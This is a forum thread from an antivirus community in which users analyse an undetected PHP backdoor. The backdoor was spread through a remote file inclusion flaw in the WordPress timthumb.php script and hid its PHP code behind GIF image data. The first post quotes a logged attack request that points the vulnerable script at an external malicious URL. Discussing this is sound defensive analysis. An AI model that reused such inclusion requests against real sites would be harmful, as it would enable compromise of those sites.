Author Topic: Backdoor php not detected?  (Read 2051 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Backdoor php not detected?
« on: February 09, 2012, 10:55:04 PM »
See: https://www.virustotal.com/url/801e01b1e0757edcb07201e4fd4b35fe927a23c7b75a320a22b8da015ec19cd0/analysis/1328823773/
and
http://vscan.urlvoid.com/analysis/f42e63123f17e6692ff5bb67ed793aad/amFtaWxhLXBocA==/
RFI malware listed at critical security as -196.36.89.12,09/Feb/2012:03:20:03 +0100,hxxp://picasa.com.dk-cell.com.mx/jamila.php,/misc//wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=hxxp://picasa.com.dk-cell.com.mx/jamila.php HTTP/1.1
See: -http://jsunpack.jeek.org/?report=6bd6e499bead9eab1736f5529a27c2fb0ddca085 (Go to last mentioned link only if security savvy, with ample script protection and in a VM),
Random vulnerability. For a description see: http://www.metod.si/random-vulnerability-disected/  link from SimpleFolia, article author razno - it has obfuscated PHP code behind the binairy data in a file that initially  tries to disguise as a GIF image – GIF89a,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37509
  • Not a avast user

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: Backdoor php not detected?
« Reply #2 on: February 09, 2012, 11:51:52 PM »
And with this malware, there is use of "End Of Transmission" as well as many other abnormal hex values for a website. See the complete list attached.
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Backdoor php not detected?
« Reply #3 on: February 10, 2012, 12:11:14 AM »
Hi Donovansrb10,

The EOT there is marking the end of the gif data source file, separating it from the PHP backdoor code part.
That is why I run webbug detector extension in GoogleChrome to be aware to webbugs on a page, but normally webbugs are not infected via rfi,
Inside the code we find ->  $lol is $_GET['lol']; <- (is equals = pol), lots of this particular RFI can be found via RFI logs,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!